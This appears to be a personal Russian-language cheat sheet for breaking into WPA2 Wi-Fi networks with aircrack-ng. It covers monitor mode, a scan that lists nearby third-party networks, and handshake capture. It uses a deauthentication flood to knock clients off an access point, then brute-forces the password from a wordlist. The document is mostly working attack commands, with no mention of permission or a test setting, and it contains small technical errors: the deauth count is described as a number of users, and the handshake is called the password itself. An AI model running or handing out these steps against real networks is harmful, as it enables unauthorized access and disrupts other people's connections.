Aircrak-NG
Created Wednesday 17 July 2024
1. Узнать интерфейс:
$ ifconfig -a
wlan0
Просто посмотреть список своих сетевых устройств: # airmon-ng
2.Перевести в режим мониторинга:
# airmon-ng start wlan0
PS: usage: airmon-ng <start|stop|check> <interface> [channel or frequency]
$ sudo ifconfig wlp8s0 down выключить карту
$ sudo ifconfig wlp8s0 up включить
3.Название интерфейса изменится ..узнаем:
# ifconfig
wlan0mon
..видим название интерфейса мониторинга
4. Что мы имеем?
# airodump-ng wlan0mon
BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID
BC:FD:0C:98:46:F5 -82 33 0 0 6 65 WPA2 CCMP PSK 70mai_d06_46f5
24:CF:24:52:9A:1A -86 3 0 0 6 270 WPA2 CCMP PSK Tymanolog
0C:80:63:C0:5C:1C -1 0 0 0 1 -1 <length: 0>
50:FF:20:A0:EB:98 -88 4 0 0 8 270 WPA2 CCMP PSK Ulubkus
52:FF:20:F0:EB:98 -89 30 0 0 8 270 WPA2 CCMP PSK <length: 0>
44:94:FC:86:E1:40 -1 0 10 0 13 -1 WPA <length: 0>
74:9D:79:D4:6B:78 -87 78 0 0 4 130 WPA2 CCMP PSK RT-WiFi-6B76
D4:6E:0E:53:0A:4E -89 56 10 0 11 270 WPA2 CCMP PSK zolnarg
5E:E9:31:26:74:65 -88 57 0 0 9 540 WPA2 CCMP PSK <length: 0>
34:0A:33:17:15:34 -89 74 0 0 13 270 WPA2 CCMP PSK DIR-806A-1532
28:6C:07:46:B8:D4 -85 91 0 0 1 130 WPA2 CCMP PSK ShishkinLes
C8:D3:A3:E8:AF:C9 -89 67 0 0 11 65 OPN DSL-2640U
5C:E9:31:36:74:65 -87 66 7 0 9 540 WPA2 CCMP PSK Oksana
F4:EC:38:AC:23:C4 -87 1 23 0 9 270 WPA2 CCMP PSK asm
.................................................................................
5. Выбираем, что надо:
# airodump-ng --bssid 08:86:30:74 :22:76 -c 6 -w WPAcrack wlan0mon
bssid 08:86:30:74 :22:76 BSSID
-c 6 канал
WPAcrack файл в который запишется "handshake"
wlan0mon адаптер в режиме мониторинга
Весь фокус в том что-бы клиент переслал на точку доступа пароль и его перехватить,
можно долго сидеть в засаде и ждать, но быстрее отключить клиента, что бы он пересоединился
по новой, поэтому:
# aireplay-ng --deauth 100 -a 08:86:30:74:22:76 wlan0mon
100 количество пользователей
bssid 08:86:30:74 :22:76 BSSID
wlan0mon адаптер в режиме мониторинга
Возвращаемся к терминалу с airodump-ng и видим "Handshake WPA" , то есть пароль захвачен
и помещен в файл WPAcrack-01.cap
6. подбираем пароль:
# aircrack-ng WPAcrack-01.cap -w /usr/share/sqlmap/txt/wordlist.txt
WPAcrack-01.cap файл где записан handshake
usr/share/sqlmap/txt/wordlist.txt путь к базе паролей